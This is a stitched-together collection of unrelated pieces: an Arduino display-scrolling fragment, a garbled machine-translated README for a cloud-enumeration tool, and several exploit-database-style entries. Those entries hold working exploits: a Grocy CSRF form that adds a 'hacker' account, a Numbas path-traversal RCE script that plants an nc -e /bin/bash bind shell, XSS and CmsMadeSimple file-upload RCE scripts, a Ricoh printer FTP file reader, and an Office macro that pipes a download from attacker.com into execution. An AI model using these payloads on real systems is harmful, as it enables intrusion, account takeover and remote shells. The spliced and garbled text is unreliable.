/* calculate the height of the text in pixel */
total_height=(uint16_t)total_lines * (uint16_t)glyph_height;
/* calculate how many lines must be drawn on the screen */
lines_per_draw=u8g2.getDisplayHeight()/glyph_height;
lines_per_draw +=2;
/* start at the top of the text */
top_window_pos=0;
}
void loop(void) {
start_line=top_window_pos/glyph_height;
top_offset=top_window_pos %glyph_height;
line_cnt=total_lines - start_line;
if ( line_cnt lines_per_draw )
line_cnt=lines_per_draw;
u8g2.firstPage();
do {
for( i=0; i line_cnt; i++ )
{
/* copy a line of the text to the local buffer */
u8x8_CopyStringLine(buf, i+start_line, c_str);
/* draw the content of the local buffer */
u8g2.drawUTF8(0, i*glyph_height-top_offset +glyph_height, buf);
}
} while ( u8g2.nextPage() );
delay(SCROLL_DELAY);
top_window_pos +=SCROLL_DELTA;
} 
# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
# Application: Grocy
# Version: <= 4.0.2
# Date: 09/21/2023
# Exploit Author: Chance Proctor
# Vendor Homepage: https://grocy.info/
# Software Link: https://github.com/grocy/grocy
# Tested on: Linux
# CVE : CVE-2023-42270
Overview
==================================================
When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
This makes it easy to adjust your request since it is a known format.
There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.
Proof of Concept
==================================================
Host the following html code via a XSS or delivery via a phishing campaign:
<html>
<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
<input name='username' value='hacker' type='hidden'>
<input name='password' value='test' type='hidden'>
<input type=submit>
</form>
<script>
history.pushState('','', '/');
document.forms[0].submit();
</script>
</html>
If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials
Username: hacker
Password: test
Note:
In order for this to work, the target must have Create User Permissions.
This is enabled by default.
Proof of Exploit/Reproduce
==================================================
http://xploit.sh/posts/cve-2023-42270/
在顶级云提供商(Amazon,Google,Microsoft,Digitalocean,Alibaba,Fultr,Linode)上查找公司(目标)基础架构,文件和应用程序的工具。结果对于虫子赏金猎人,红色团队者和穿透测试人员都有用。
完整的写入可用。这里
动机
我们一直在想一些可以自动化的东西,以使黑盒安全测试更加容易。我们讨论了创建一个多个平台云蛮力猎人的想法。要查找托管在云上的开放存储桶,应用程序和数据库,并可能在代理服务器后面进行应用程序。
这是我们尝试修复的先前方法的列表问题:
separate words lack of proper concurrency lack of supporting all major cloud providers require authentication or keys or cloud CLI access outdated endpoints and regions Incorrect file storage detection lack support for proxies (useful for bypassing region restrictions) lack support for user agent randomization (useful for bypassing rare restrictions) hard to use, poorly configured
功能
Cloud detection (IPINFO API and Source Code) Supports all major提供商Black-Box(未经身份验证)快速(并发)模块化且易于自定义的跨平台(Windows,Linux,Mac)用户代理随机化代理代理随机化(HTTP,Socks5)
支持的云提供商
-1010 Microsoft3:-存储- 应用程序- 应用程序- 应用
Amazon:-存储- 应用程序
Google:-存储- 应用程序
Digitalocean:-存储
fuvtr:-存储
Linode:-存储
Alibaba:-存储
版本
1.0.0
用法
只需下载用于操作系统的最新版本,然后遵循使用情况即可。
为了充分利用此工具,您必须了解如何正确配置它。当您打开下载版本时,有一个配置文件夹,其中有一个config.yaml文件。
看起来像这样
Providers: ['Amazon','Alibaba','Amazon',“ Microsoft”,“ Digitalocean”,“ Linode”,“ Linode”,“ fultr”,“ Google”]#支持提供者
Environments: ['test','dev','prod','stage','staging','bak']#用于突变
proxytype:'http'#socks5/http
ipinfo:''#ipinfo.io api键ipinfo api,您可以在ipinfo上注册并获取免费的键,该环境(用于生成URL的环境,例如test-keyword.target.target.region和test.keyword.target.target.region等,等等。
我们提供了一些单词列表,但是最好在执行工具之前自定义和最小化您的单词列表(基于您的侦察)。
设置API键后,您可以使用CloudBrute。
██████╗██╗██████╗██╗██╗██╗██████╗██████╗██╗██╗
██╔════╝██║██╔═════███║
██║██║██║██║██║██║██║██████╔╝██████╔╝██║██║█████╗
██║██║██║█████║████║████╔══███║██═══██║██║
╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║██║╚██████╔╝██║
╚══════╚═══════╝╚════╝╚════╝╚════╝╚════╝╚═══╝
V 1.0.7
USAGE: CloudBrute [-h | -help] -d | - Domain'value'-k | -keyword'value'value'
-w | -wordList'value'[-c | -cloud'value'] [-t | -threads
整数] [-t | -pimeout Integer] [-p | -proxy'value']
[-a | -randomagent'value'] [-d | -debug] [-Q | - que]
[-m | - 模式'value'] [-o | -utput'value']
[-c | -configfolder'value']
很棒的云枚举
参数:
-h--螺旋打印帮助信息
-D-域域
-k - 用来生成URL的关键字
-w-文字列表列表路径
-c - 云强制搜索,检查config.yaml提供程序列表
-t-线程数的线程数。 Default: 80
-t-秒内每个请求的超时时间秒。 Default: 10
-P- Proxy使用代理列表
-a-随机用户代理随机化
-d-示例显示调试日志。 default: false
-Q- quite抑制所有输出。 default: false
-M-模式存储或应用。 Default:存储
-O-输出输出文件。 default: out.txt
-c - configfolder配置路径。 default: config例如
CloudBrute -d target.com -k target -M存储-M存储-T 80 -T 10 -W'./data/storage_small.txt'请注意- 用于生成URL的关键字,因此,如果您希望完整的域是突变的一部分,则您已将其用于域(-d)和键盘(-K)参数
如果未检测到云提供商或希望在特定提供商上搜索强制搜索,则可以使用-c选项。
CloudBrute -D Target.com -K关键字-M存储-M存储-T 80 -W 10 -W -C Amazon -o Target_output.txt
dev
克隆repo go build -o CloudBrute main.Go Go Go Internal
在动作中
3:010 3:010 3
如何贡献
添加一个模块或修复内容,然后拉动请求。与您认为可以使用它的人分享。做额外的工作,并与社区
常见问题
如何从此工具中发挥最佳作用?
分享您的发现。
我会出现错误;我该怎么办?
请确保正确阅读使用情况,如果您认为发现错误打开问题。
当我使用代理时,我会遇到太多错误,或者太慢?
这是因为您使用公共代理,请使用私人和更高质量的代理。您可以使用Proxyfor与所选的提供商一起验证良好的代理。
太快还是太慢?
更改-T(超时)选项,以获取最佳效果。
信用
灵感来自此处列出的每个回购。
# Exploit Title: Numbas < v7.3 - Remote Code Execution
# Google Dork: N/A
# Date: March 7th, 2024
# Exploit Author: Matheus Boschetti
# Vendor Homepage: https://www.numbas.org.uk/
# Software Link: https://github.com/numbas/Numbas
# Version: 7.2 and below
# Tested on: Linux
# CVE: CVE-2024-27612
import sys, requests, re, argparse, subprocess, time
from bs4 import BeautifulSoup
s = requests.session()
def getCSRF(target):
url = f"http://{target}/"
req = s.get(url)
soup = BeautifulSoup(req.text, 'html.parser')
csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
return csrfmiddlewaretoken
def createTheme(target):
# Format request
csrfmiddlewaretoken = getCSRF(target)
theme = 'ExampleTheme'
boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
data = (
f'--{boundary}\r\n'
'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
'\r\n'
f'{csrfmiddlewaretoken}\r\n'
f'--{boundary}\r\n'
'Content-Disposition: form-data; name="name"\r\n'
'\r\n'
f'{theme}\r\n'
f'--{boundary}--\r\n'
)
headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',
'User-Agent': 'Mozilla/5.0',
'Accept': '*/*',
'Connection': 'close'}
# Create theme and return its ID
req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
redir = req.url
split = redir.split('/')
id = split[4]
print(f"\t[i] Theme created with ID {id}")
return id
def login(target, user, passwd):
print("\n[i] Attempting to login...")
csrfmiddlewaretoken = getCSRF(target)
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
'username': user,
'password': passwd,
'next': '/'}
# Login
login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
res = login.text
if("Logged in as" not in res):
print("\n\n[!] Login failed!")
sys.exit(-1)
# Check if logged and fetch ID
usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
if usermatch:
user = usermatch.group(1)
idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
if idmatch:
id = idmatch.group(1)
print(f"\t[+] Logged in as \"{user}\" with ID {id}")
def checkVuln(url):
print("[i] Checking if target is vulnerable...")
# Attempt to read files
themeID = createTheme(url)
target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
hname = s.get(f"{target}/etc/hostname")
ver = s.get(f"{target}/etc/issue")
hnamesoup = BeautifulSoup(hname.text, 'html.parser')
versoup = BeautifulSoup(ver.text, 'html.parser')
hostname = hnamesoup.find('textarea').get_text().strip()
version = versoup.find('textarea').get_text().strip()
if len(hostname) < 1:
print("\n\n[!] Something went wrong - target might not be vulnerable.")
sys.exit(-1)
print(f"\n[+] Target \"{hostname}\" is vulnerable!")
print(f"\t[i] Running: \"{version}\"")
# Cleanup - delete theme
print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
target = f"http://{url}/themes/{themeID}/delete"
csrfmiddlewaretoken = getCSRF(url)
data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}
s.post(target, data=data)
def replaceInit(target):
# Overwrite __init__.py with arbitrary code
rport = '8443'
payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
csrfmiddlewaretoken = getCSRF(target)
filename = '../../../../numbas_editor/numbas/__init__.py'
themeID = createTheme(target)
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
'source': payload,
'filename': filename}
print("[i] Delivering payload...")
# Retry 5 times in case something goes wrong...
for attempt in range(5):
try:
s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
except Exception as e:
pass
# Establish connection to bind shell
time.sleep(2)
print(f"\t[+] Payload delivered, establishing connection...\n")
if ":" in target:
split = target.split(":")
ip = split[0]
else:
ip = str(target)
subprocess.Popen(["nc", "-n", ip, rport])
while True:
pass
def main():
parser = argparse.ArgumentParser()
if len(sys.argv) <= 1:
print("\n[!] No option provided!")
print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
sys.exit(-1)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
parser.add_argument('--target', help='Target IP:PORT')
parser.add_argument('--user', help='Username to authenticate')
parser.add_argument('--passwd', help='Password to authenticate')
args = parser.parse_args()
action = args.action
target = args.target
user = args.user
passwd = args.passwd
print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")
if action == 'check':
login(target, user, passwd)
checkVuln(target)
elif action == 'exploit':
login(target, user, passwd)
replaceInit(target)
else:
sys.exit(-1)
if __name__ == "__main__":
main()
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346
import requests
import urllib.parse
# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"
# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)
# Build the request parameters
params = {
"nm_member": payload
}
# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)
#Exploit Title: Ricoh Printer Directory and File Exposure
#Date: 9/15/2023
#Exploit Author: Thomas Heverin (Heverin Hacker)
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
#Version: Ricoh Printers - All Versions
#Tested on: Windows
#CVE: N/A
#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)
from ftplib import FTP
def ftp_connect(ip):
try:
ftp = FTP(ip)
ftp.login("guest", "guest")
print(f"Connected to {ip} over FTP as 'guest'")
return ftp
except Exception as e:
print(f"Failed to connect to {ip} over FTP: {e}")
return None
if __name__ == "__main__":
target_ip = input("Enter the Ricoh Printer IP address: ")
ftp_connection = ftp_connect(target_ip)
if ftp_connection:
try:
while True:
file_list = ftp_connection.nlst()
print("List of Ricoh printer files and directories:")
for index, item in enumerate(file_list, start=1):
print(f"{index}. {item}")
file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
if file_index < 0:
break
if 0 <= file_index < len(file_list):
selected_file = file_list[file_index]
lines = []
ftp_connection.retrlines("RETR " + selected_file, lines.append)
print(f"Contents of '{selected_file}':")
for line in lines:
print(line)
else:
print("Invalid file index.")
except Exception as e:
print(f"Failed to perform operation: {e}")
finally:
ftp_connection.quit()
#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Remote Code Execution(RCE)
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
import requests
login_url = 'http://localhost/admin/login.php'
username=input('username = ')
password=input('password = ')
upload_url = 'http://localhost/admin/moduleinterface.php'
file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ")
#phar file content """"<?php echo system('cat /etc/passwd') ?>"""""
login_data = {
'username': username,
'password': password,
'loginsubmit': 'Submit'
}
session = requests.Session()
response = session.post(login_url, data=login_data)
if response.status_code == 200:
print('Login account')
else:
print('Login promlem.')
exit()
files = {
'm1_files[]': open(file_path, 'rb')
}
data = {
'mact': 'FileManager,m1_,upload,0',
'__c': session.cookies['__c'],
'disable_buffer': '1'
}
response = session.post(upload_url, files=files, data=data)
if response.status_code == 200:
print('file upload')
rce_url=f"http://localhost/uploads/{file_path}"
rce=requests.get(rce_url)
print(rce.text)
else:
print('file not upload')
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285
## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using a malicious `Word` file for
`Office-365 API`. After the user will open the file to read it, from
the API of Office-365, without being asked what it wants to activate,
etc, he will activate the code of the malicious server, which he will
inject himself, from this malicious server. Emedietly after this
click, the attacker can receive very sensitive information! For bank
accounts, logs from some sniff attacks, tracking of all the traffic of
the victim without stopping, and more malicious stuff, it depends on
the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim
hit the button of the exploit!
[+]PoC:
```cmd
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
vbNormalFocus)
End Sub
```
## FYI:
The PoC has a price and this report will be uploaded with a
description and video of how you can reproduce it only.
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)
## Time spend:
01:30:00